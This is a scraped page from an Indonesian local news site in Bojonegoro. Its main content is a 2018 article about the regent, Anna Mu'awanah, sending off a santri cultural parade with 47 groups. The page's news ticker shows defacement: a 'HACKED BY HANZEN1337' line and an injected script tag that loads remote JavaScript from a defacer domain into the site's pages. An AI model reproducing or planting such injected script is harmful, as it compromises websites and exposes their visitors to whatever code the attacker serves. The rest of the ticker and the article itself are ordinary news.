News Ticker
  • HACKED BY HANZEN1337
  • <script src="https://jso.defacer.id/raw/I7j6n4T3C9"></script>
  • Kunjungan Kerja di Bojonegoro, Menhan Sjafrie Sjamsoeddin Tinjau Rencana Pengembangan Batalyon TP 885 dan Brigif 33 di Dander
  • 11 Juli dalam Sejarah
  • Prakiraan Cuaca Bojonegoro 11 Juli 2026
  • Kandang Ayam Senilai Rp2 M di Malo, Bojonegoro Ludes Terbakar
  • Panen Melon Bersama, Bupati Bojonegoro Ajak Generasi Muda Bangun Pertanian Modern
  • Pemkab Bojonegoro Alokasikan Rp11,03 Miliar untuk Lima Program Beasiswa Mahasiswa
  • Seorang Lansia Bojonegoro Tewas Tertabrak Kereta Api Jayabaya di Perlintasan Baureno
  • Perkiraan Harga Emas Hari Ini, 10 Jul 2026
  • Prakiraan Cuaca Bojonegoro 10 Juli 2026
  • 10 Juli dalam Sejarah
  • Kecamatan Kota Dominasi Emas Kickboxing, Klasemen Sementara Porkab II Bojonegoro Masih Memimpin
  • Dalam Sehari Terjadi Enam Kebakaran Lahan di Bojonegoro, Ini Daftarnya
  • Pemkab Bojonegoro Berikan Pembinaan Ribuan Mahasiswa Penerima Beasiswa Daerah
  • "El Último Tango", Sepatu Spesial Adidas untuk Perjalanan Terakhir Messi di Piala Dunia
  • Kejari Bojonegoro Terima Tahap II Kasus Dugaan Peredaran Rokok Ilegal
  • Paripurna DPRD, Raperda Pertanggungjawaban APBD 2025 Disetujui
  • Hadapi Musim Kemarau, Pemkab Bojonegoro Distribusikan Air Bersih ke Sejumlah Desa
  • Pemkab Bojonegoro Dorong Setiap OPD Lahirkan Inovasi Lewat BIA 2026
  • Prakiraan Cuaca Bojonegoro 9 Juli 2026
  • Rumah Kosong di Kapas, Bojonegoro Terbakar, Kerugian Capai 150 Juta Rupiah
  • Merayakan Detik Ini: Menemukan Kedamaian dalam Jejak Hidup yang Singkat
  • Tiga Rumah di Temayang Bojonegoro Terbakar Akibat Korsleting Listrik, Total Kerugian 520 Juta Rupiah
Bupati Anna Berangkatkan Pawai Budaya Santri

Hari Santri Nasional 2018

Bupati Anna Berangkatkan Pawai Budaya Santri

Oleh Muliyanto

Bojonegoro – Bupati Bojonegoro DR Hj Anna Mu’awanah memberangkatkan rombongan pawai budaya santri, Minggu (11/11/2018) dari depan Pendapa Pemkab Jalan Mas Tumapel. Pawai budaya santri ini termasuk rangkaian Semarak Hari Santri Nasional yang jatuh tepat pada 22 Oktober beberapa waktu lalu. Sebanyak 47 grup dari berbagai lembaga meramaikan pawai ini.

Sebelum memberangkatkan, Bupati Anna berpesan kepada para peserta bahwa pawai perlu dilestarikan agar masyarakat semakin akrab dengan budaya santri.

"Selain pawai budaya santri, yang perlu dilestarikan yaitu lomba olahraga tradisional seperti gobak sodor, egrang yang pelaksanaannya dilaksanakan di wilayah Kecamatan Kota Bojonegoro," paparnya.

Bu Anna menambahkan, dalam pawai budaya santri setiap peserta menyuguhkan berbagai penampilan yang menarik dan pastinya sangat menghibur masyarakat Bojonegoro. Peserta juga diimbau agar tetap menjaga kebersihan dan selalu tetap menampilkan atraksi yang baik selama melewati rute yang telah ditentukan.

Warga nampak begitu antusias menyaksikan.  Bahkan mereka rela berpanas-panasan menyaksikan setiap penampilan group peserta pawai budaya santri ini.

pawai budaya santri ini diikuti sebanyak 47 grup yang terbagi menjadi kategori anak-anak dari tingkat SD/MI/MTs maupun Madrasah Diniyah dan kategori umum yakni dari tingkat SMA hingga Pondok Pesantren.

Hadir pula dalam acara pemberangkatan ini para Staf Ahli,  Kepala Dinas Pariwisata, Kabag Kesra, Kepala Dinas Pendidikan dan dari Kemenag Bojonegoro. (mol/imm)

Berita Terkait
1783876174.0361 at start, 1783876174.7528 at end, 0.71667504310608 sec elapsed